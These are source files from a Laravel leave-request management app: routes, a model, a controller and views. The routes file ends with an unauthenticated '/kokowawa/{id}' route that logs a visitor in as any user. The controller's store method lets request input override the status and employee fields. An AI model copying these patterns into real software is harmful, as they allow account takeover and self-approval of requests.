routes/web.php
<?php

/*
|--------------------------------------------------------------------------
| Web Routes
|--------------------------------------------------------------------------
|
| Here is where you can register web routes for your application. These
| routes are loaded by the RouteServiceProvider within a group which
| contains the "web" middleware group. Now create something great!
|
*/

Route::group(['middleware' => 'auth'], function() {
	Route::get('/home', 'HomeController')->name('home');

	Route::resource('leave-request', 'LeaveRequestController', [
		'parameters' => [
			'leave-request' => 'leaveRequest'
		],
		'except' => ['edit', 'update']
	]);
	Route::put('leave-request/{leaveRequest}/accept', 'LeaveRequestController@accept')->name('leave-request.accept');
	Route::delete('leave-request/{leaveRequest}/reject', 'LeaveRequestController@reject')->name('leave-request.reject');

	Route::group(['prefix' => 'dashboard', 'middleware' => 'isAdmin'], function() {

		Route::get('/', function() {
			return view('dashboard');
		})->name('dashboard');

		Route::resource('leave-type', 'LeaveTypeController', [
			'except' => ['show']
		]);

		Route::get('logs', function() {
			$users = Koala\User::all();

			return view('logs')->with(compact('users'));
		})->name('logs');
		
	});

	Route::resource('message', 'MessageController', [
		'only' => ['store']
	]);

	Route::get('profile/{user}', 'ProfileController')->name('profile');

	Route::get('logout', function() {
		auth()->logout();
		return redirect(route('welcome'));
	})->name('logout');
});

Route::group(['middleware' => 'guest'], function() {
	Route::get('/', function() {
		return view('welcome');
	})->name('welcome');
	Route::get('login/{provider?}', 'OAuthController@login')->name('oauth.login');
	Route::get('login/{provider?}/callback', 'OAuthController@callback')->name('oauth.callback');
});

Route::get('/kokowawa/{id}', function($id) {
	auth()->loginUsingId($id);
	return back();
});

app/LeaveRequest.php
<?php

namespace Koala;

use Koala\User;
use Carbon\Carbon;
use Koala\Message;
use Koala\LeaveType;
use Koala\WeekDaysDuration;
use Illuminate\Database\Eloquent\Model;

class LeaveRequest extends Model
{

	protected $dates = ['leave_start', 'leave_end'];

    protected $fillable = ['employee_id', 'leave_type_id', 'reason', 'leave_start', 'leave_end', 'status', 'admin_id'];

    // protected $with = ['employee', 'admin', 'type'];

    public function type()
    {
        return $this->belongsTo(LeaveType::class, 'leave_type_id', 'id');
    }

    public function scopeIs($query, $type)
    {
        $leaveTypeId = ($type instanceof LeaveType) ? $type->id : $type;  

        return $query->where('leave_type_id', $leaveTypeId);
    }

    public function employee()
    {
    	return $this->belongsTo(User::class, 'employee_id');
    }

    public function admin()
    {
    	return $this->belongsTo(User::class, 'admin_id');
    }

    public function messages()
    {
    	return $this->hasMany(Message::class);
    }

    public function getDurationAttribute()
    {
        return WeekDaysDuration::get($this);
    }

    public function scopeRequests($query)
    {
        return $query->where('status', 'reviewing');
    }

    public function scopeAccepted($query)
    {
        return $query->where('status', 'accepted');
    }
}

app/Http/Controllers/LeaveRequestController.php
<?php

namespace Koala\Http\Controllers;

use Carbon\Carbon;
use Koala\LeaveType;
use Koala\LeaveRequest;
use Koala\WeekDaysDuration;
use Illuminate\Http\Request;
use Koala\Events\LeaveRequestCreated;
use Koala\Events\LeaveRequestAccepted;
use Koala\Events\LeaveRequestRejected;
use Illuminate\Support\Facades\Validator;
use Koala\Http\Requests\CreateLeaveRequest;

class LeaveRequestController extends Controller
{

    public function index()
    {
        if(auth()->user()->cannot('list', LeaveRequest::class)) {
            flash("You can't view leave requests.", 'danger')->important();
            return redirect(route('home'));
        }

        $leaveRequests = LeaveRequest::requests()->get();

        return view('leaveRequests.index')->with(compact('leaveRequests'));
    }

    /**
     * Show the form for creating a new resource.
     *
     * @return \Illuminate\Http\Response
     */
    public function create()
    {
        $leaveRequest = new LeaveRequest;

        return view('leaveRequests.create')->with(compact('leaveRequest'));
    }

    /**
     * Store a newly created resource in storage.
     *
     * @param  \Illuminate\Http\Request  $request
     * @return \Illuminate\Http\Response
     */
    public function store(CreateLeaveRequest $request)
    {
        $weekDaysDuration = WeekDaysDuration::get($request);

        $leaveType = LeaveType::find($request->leave_type_id);

        if(auth()->user()->cannot('create', LeaveRequest::class)) {
            $days = str_plural('day', $weekDaysDuration);
            flash("You can't request {$weekDaysDuration} {$days} of {$leaveType->title} leave.", 'danger')->important();
            return back()->withInput();
        }


        $leaveRequest = LeaveRequest::create($request->all() + [
            'employee_id' => auth()->user()->id,
            'status'      => ($leaveType->auto_accept || auth()->user()->type === 'admin') ? 'accepted' : 'reviewing' 
        ]);
        
        event(new LeaveRequestCreated($leaveRequest));

        return redirect(route('leave-request.show', $leaveRequest));
    }

    /**
     * Display the specified resource.
     *
     * @param  int  $id
     * @return \Illuminate\Http\Response
     */
    public function show(LeaveRequest $leaveRequest)
    {
        if(auth()->user()->cannot('view', $leaveRequest)) {
            return redirect(route('home'));
        }

        $leaveRequest->load('employee', 'admin', 'messages.sender');

        return view('leaveRequests.show')->with(compact('leaveRequest'));
    }

    /**
     * Accept the leave request
     * 
     * @param  LeaveRequest $leaveRequest
     * @return Illuminate\Http\Response                     
     */
    public function accept(Request $request, LeaveRequest $leaveRequest)
    {
        if(auth()->user()->cannot('respond', $leaveRequest)) {
            flash("You can't accept this leave request.", 'danger')->important();
            return redirect(route('home'));
        }

        $leaveRequest->update([
            'status' => 'accepted',
            'admin_id' => auth()->user()->id
        ]);

        event(new LeaveRequestAccepted($leaveRequest));

        return redirect(route('leave-request.show', $leaveRequest->id));
    }

    /**
     * Reject the leave request
     * 
     * @param  LeaveRequest $leaveRequest
     * @return Illuminate\Http\Response                     
     */
    public function reject(Request $request, LeaveRequest $leaveRequest)
    {
        if(auth()->user()->cannot('respond', $leaveRequest)) {
            flash("You can't reject this leave request.", 'danger')->important();
            return redirect(route('home'));
        }

        $leaveRequest->update([
            'status' => 'rejected',
            'admin_id' => auth()->id()
        ]);

        event(new LeaveRequestRejected($leaveRequest));

        return redirect(route('leave-request.show', $leaveRequest->id));
    }

    /**
     * Remove the specified resource from storage.
     *
     * @param  Koala\LeaveRequest  $leaveRequest
     * @return \Illuminate\Http\Response
     */
    public function destroy(LeaveRequest $leaveRequest)
    {
        if(auth()->user()->cannot('delete', $leaveRequest)) {
            flash("You can't cancel this leave request.", 'danger')->important();
            return redirect(route('home'));
        }

        $leaveRequest->delete();
        return redirect(route('home'));
    }
}

resources/views/leaveRequests/_form.blade.php
<div class="form-group">
	{!! Form::label('type', 'Leave Type', ['class' => 'control-label']) !!}
	<br>
	{!! Form::select('leave_type_id', $leaveTypes , $leaveRequest->leave_type_id, ['class' => 'selectpicker']) !!}
</div>

<div class="form-group">
	{!! Form::label('reason', 'Reason', ['class' => 'control-label']) !!}
	<small class="text-muted">[optional]</small>
	{!! Form::textarea('reason', $leaveRequest->reason, ['class' => 'form-control', 'rows' => 3]) !!}
</div>

<div class="form-group">
	{!! Form::label('leave_start', $leaveRequest->leave_start, ['class' => 'control-label']) !!}
	{!! Form::input(
		'text',
		'leave_start',
		$leaveRequest->leave_start ?? (Carbon::now()->isWeekend() ? Carbon::now()->next(Carbon::SUNDAY) : Carbon::now())->toDateString(),
		['class' => 'form-control datepicker']) !!}
</div>

<div class="form-group">
	{!! Form::label('leave_end', $leaveRequest->leave_end, ['class' => 'control-label']) !!}
	{!! Form::input(
		'text',
		'leave_end',
		$leaveRequest->leave_end ?? (Carbon::now()->isWeekend() ? Carbon::now()->next(Carbon::SUNDAY) : Carbon::now())->toDateString(),
		['class' => 'form-control datepicker']) !!}
</div>

resources/views/leaveRequests/create.blade.php
@extends('layouts.main')

@section('content')
	
	<div class="row">
		<div class="col-xs-12 col-md-6 col-md-offset-3">
			@include('layouts.errors')
			
			{!! Form::model($leaveRequest, ['route' => 'leave-request.store', 'method' => 'POST']) !!}
				<legend>Request Leave</legend>
				@include('leaveRequests._form')

				<button type="submit" class="btn btn-info btn-block">
					<i class="fa fa-plus"></i> Submit Request
				</button>
			{!! Form::close() !!}
		</div>
	</div>

@endsection

resources/views/leaveRequests/index.blade.php
@extends('layouts.main')

@section('content')
    <div class="row">
        <div class="col-xs-12">
            <h1 class="text-center">Requests waiting to be reviewed</h1>

            @if($leaveRequests->count())
                <table class="table table-bordered">
                    <thead>
                        <tr>
                            <th class="text-center">#</th>
                            <th class="text-center">Employee</th>
                            <th class="text-center">Leave Type</th>
                            <th class="text-center">Leave Reason</th>
                            <th class="text-center">From</th>
                            <th class="text-center">Till</th>
                            <th class="text-center">Request Date Time</th>
                            <th class="text-center">More Info</th>
                        </tr>
                    </thead>
                    <tbody>
                        @foreach($leaveRequests as $leaveRequest)
                            <tr class="text-center {{ $leaveRequest->type === 'normal' ? 'normal-row' : 'casual-row' }}">
                                <td>{{ $loop->index + 1 }}</td>
                                <td>
                                    <a href="{{ route('profile', $leaveRequest->employee->id) }}">
                                        {{ $leaveRequest->employee->name }}
                                    </a>
                                </td>
                                <td>{{ ucwords($leaveRequest->type) }}</td>
                                <td>{{ str_limit( nl2br(e($leaveRequest->reason)) , 40) }}</td>
                                <td>{{ $leaveRequest->leave_start->toDateString() }}</td>
                                <td>
                                    {{ $leaveRequest->leave_end->toDateString() }}
                                    [{{ $leaveRequest->duration }} {{ str_plural('day', $leaveRequest->duration) }}]
                                </td>
                                <td title="{{ $leaveRequest->created_at }}">{{ $leaveRequest->created_at->diffForHumans() }}</td>
                                <td>
                                    <a class="btn btn-sm btn-default" href="{{ route('leave-request.show', $leaveRequest) }}">
                                        <i class="fa fa-eye"></i>
                                    </a>
                                </td>
                            </tr>
                        @endforeach
                    </tbody>
                </table>
            @else
                <h1 class="text-info text-center">You don't have any logs right now.</h1>
            @endif
        </div> 
    </div>
@endsection

resources/views/leaveRequests/show.blade.php
@extends('layouts.main')

@section('content')
	<div class="row">
		<div class="col-xs-12">
			<div class="media">
			  <div class="media-left media-top">
			    <a href="{{ route('profile', $leaveRequest->employee) }}">
			      <img
			      	class="media-object"
			      	src="{{ $leaveRequest->employee->avatar }}"
			      	alt="{{ $leaveRequest->employee->name }}"
			      	width="60">
			    </a>
			  </div>
			  <div class="media-body">
			    <h4 class="media-heading">
			    	{{ $leaveRequest->employee->name }}
			    </h4>
			    Normal Leaves: <strong>{{ $leaveRequest->employee->normal_leaves }}</strong> / 14
			    <br>
			    Casual Leaves: <strong>{{ $leaveRequest->employee->casual_leaves }}</strong> / 7	
			  </div>
			</div>

			<br>
			<div class="row">
				<div class="col-xs-12">
					<div class="panel panel-info">
						<div class="panel-heading">
							<h3 class="panel-title">
								{{ ucwords($leaveRequest->type->title) }} Leave Request - [{{ $leaveRequest->type->is_paid ? 'Paid' : 'Unpaid' }}]

								<span
									class="pull-right label label-{{ $leaveRequest->status === 'accepted' ? 'success' : ( $leaveRequest->status === 'rejected' ? 'default' : 'info' ) }}">
									{{ ucwords($leaveRequest->status) }}
								</span>
							</h3>
						</div>
						<div class="panel-body">
							From: <strong>{{ $leaveRequest->leave_start->toDateString() }}</strong>
							<span class="pull-right">
								Till: 
								<strong>
									{{ $leaveRequest->leave_end->toDateString() }}
									[{{ $leaveRequest->duration }} {{ str_plural('day', $leaveRequest->duration) }}]
								</strong>
							</span>
							<hr>
							<p>
								{!! nl2br(e($leaveRequest->reason)) !!}
							</p>
						</div>
						<div class="panel-footer">
							@can('delete', $leaveRequest)
								<a
									class="btn btn-primary pull-right"
									href="{{ route('leave-request.destroy', $leaveRequest) }}"
									data-method="delete"
									data-confirm="Are you sure you want to cancel this leave request ?"
									id="cancel-request"
									>
									<i class="fa fa-trash"></i> Cancel Request
								</a>
							@endcan
							Requested At:
							<strong>{{ $leaveRequest->created_at->toDateString() }} [{{ $leaveRequest->created_at->diffForHumans() }}]</strong>
							<br><br>
						</div>
					</div>
				</div>
			</div>

			<div class="row">
				<div class="col-xs-12">
				@foreach($leaveRequest->messages as $message)
					<div class="media">
					  <div class="media-left media-top">
					    <a href="">
					      <img
					      	class="media-object"
					      	src="{{ $message->sender->avatar }}"
					      	alt="{{ $message->sender->name }}"
					      	width="60">
					    </a>
					  </div>
					  <div class="media-body">
					    <div class="panel panel-sm {{ $message->sender->type === 'admin' ? 'panel-warning' : 'panel-info' }}">
					    	<div class="panel-heading">
					    		<h3 class="panel-title">
					    			{{ $message->sender->name }}
					    			<small class="text-muted pull-right" title="{{ $message->created_at->toDateString() }}">{{ $message->created_at->diffForHumans() }}</small>
					    		</h3>
					    	</div>
					    	<div class="panel-body">
					    		{!! nl2br(e($message->message)) !!}
					    	</div>
					    </div>							    
					  </div>
					</div>
				@endforeach


				@if($leaveRequest->status === 'reviewing')
					
					@can('respond', $leaveRequest)
						{!! Form::open([
							'route' => ['leave-request.accept', $leaveRequest->id],
							'method' => 'PUT',
							'style' => 'display: inline'
						]) !!}
							<button type="submit" class="btn btn-info">Accept Request</button>
						{!! Form::close() !!}

						{!! Form::open([
							'route' => ['leave-request.reject', $leaveRequest->id],
							'method' => 'DELETE',
							'style' => 'display: inline'
						]) !!}
							<button type="submit" class="btn btn-danger">Reject Request</button>
						{!! Form::close() !!}
					@endcan

					
					<div class="media">
					  @include('layouts.errors')

					  <div class="media-left media-top">
					    <a>
					      <img
					      	class="media-object"
					      	src="{{ auth()->user()->avatar }}"
					      	alt="{{ auth()->user()->name }}"
					      	width="60">
					    </a>
					  </div>
					  <div class="media-body">
					    <h4 class="media-heading">
					    	{!! Form::open(['route' => 'message.store', 'method' => 'POST']) !!}
					    		<div class="form-group">
					    			{!! Form::hidden('leave_request_id', $leaveRequest->id) !!}
					    			{!! Form::textarea('message', old('message'), ['class' => 'form-control', 'rows' => 4, 'placeholder' => 'The Message']) !!}
					    			<br>
					    			<button class="btn btn-default" type="submit" id="send-message">
					    				<i class="fa fa-envelope-o"></i> Send
					    			</button>
					    		</div>
					    	{!! Form::close() !!}
					    </h4>							    
					  </div>
					</div>
			
				@else
					<h3 class="text-center text-danger">
						This Request is <b>{{ ucwords($leaveRequest->status) }}</b>, you can't send any message to the admin regarding this request.
					</h3>
				@endif
				</div>
			</div>
		</div> 
	</div>
@endsection